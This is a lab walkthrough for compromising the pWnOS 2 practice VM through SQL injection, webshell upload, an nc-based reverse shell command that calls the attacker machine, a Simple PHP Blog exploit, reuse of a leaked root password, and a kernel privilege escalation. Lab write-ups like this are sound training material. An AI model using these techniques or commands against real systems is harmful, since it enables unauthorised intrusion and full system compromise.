pWnOS 2 is boot2root virtual machine designed for students to practice vulnerability analysis and exploitation. Objective is to root this virtual machine by exploiting possible vulnerabilities leading to full system compromise.
- VMWare workstation for Virtual Machines
- Kali Linux VM cutom network with subnet 10.10.10.1/24 range
- 0 VM custom network with subnet 10.10.10.1/24. Static IP address of pWnOS2.0 is 10.10.10.100
Kali Linux network settings
pwnOS network settings
- Kali Linux VM
- Sql Injection
- Shell upload with sql injection, database misconfiguration.
- System misconfiguration, reuse of root password.
- Linux Kernel 2.6.32 < 3.x (CentOS 5/6) – ‘PERF_EVENTS’ Local Privilege Escalation
Target VM IP Address: 10.10.10.100
#nmap -p- -A -oX nmap-pwnOS2.xml –webxml 10.10.10.100
- Target OS is between Linux 2.6.32 – 2.6.39
- OpenSSH 5.8p1 is installed on port 22
- Apache httpd 2.2.17 is installed on port 80
Exploit path 1 for shell: SQL Injection
Lets explore website in browser.
Login page, lets check for sql injection.
See! we found sql injection. Also note down absolute path of website on server as ‘/var/www/login.php’. Using sql injecion, we can try uploading webshell using this disclosed local path.
Know time for burpsuite to exploit sql injection.
After database enumeration, we found:
columns for user table:user_id, first_name, last_name, email, pass, user_level, active
Lets crack hash for Dan, and gess what, i found cleartext password for given hash at hashkiller.co.uk. Cleartext password is killerbeesareflying.
Alfter logging in with firstname.lastname@example.org:killerbeesareflying there is nothing much we can do except seeing WAF warning message.
Lets analyse further to find another way. We can read local files. So, there is username dan on local machine.
Lets upload shell using sql injection
confirm, if webshell is uploaded successfully. Confirming in burpsuite.
Confirming shell is uploaded in browser.
Yes! webshell is uploaded successfully.
Next step to find a writable directory on server. After exploring i found /var/www/blog/config directory writable by www-data
Time to get interactive shell. Lets see, if nc is available on server.
nc is available.
lets upload php_reverse_shell.php by pentest monkey. You can find this webshell in kali linux /usr/share/webshells/php/php-reverse-shell.php
Configuring ip:port to kali linux attacking machine
Transfer reverse shell to target vm.
http://10.10.10.100/shell7.php?cmd=nc 10.10.10.128 8888 > /var/www/blog/config/rshell.php&
confirm rshell is uploaded
Listening for php-reverse-shell netcat shell
open rshell in browser to execute shell.
and we got shell
break jail shell
Exploit path 2 for Shell: Exploiting multiple vulnerabilities in Simple PHP Blog
Lets check for other directories on server with dirb.
With nikto, we found a directory “blog”
This is “Simple PHP Blog 0.4.0”
lets google for any available exploit for “Simple PHP Blog 0.4.0”
exploit link https://www.exploit-db.com/exploits/1191/
or use searchsploit to find exploit for simple php blog
Lets try Multiple Remote exploit
lets upload cmd.php
./sphpblog.pl -h http://10.10.10.100/blog -e 1
lets explore shell in browser
We can execute commands. Again, we can upload reverse shell in php and get interactive shell for nc as we did above. I am not going to repeat same. Lets go for pivileges escalation.
Privilege Escalation 1: Misconfiguration
we found db root username and password in mysqli_connect.php file at /var/ directory
lets reuse these credentials for secure shell
Congrats! We are root!
Privilege Escalation 2: Kernel exploit
lets check kernel version
there is perf_events exploit for this kernel that works.
I uploaded this exploit using nc. Know, lets try this exploit
Congrats! We are root!
This is great Boot2Root VM. Rooting this VM i learned and enjoyed a lot.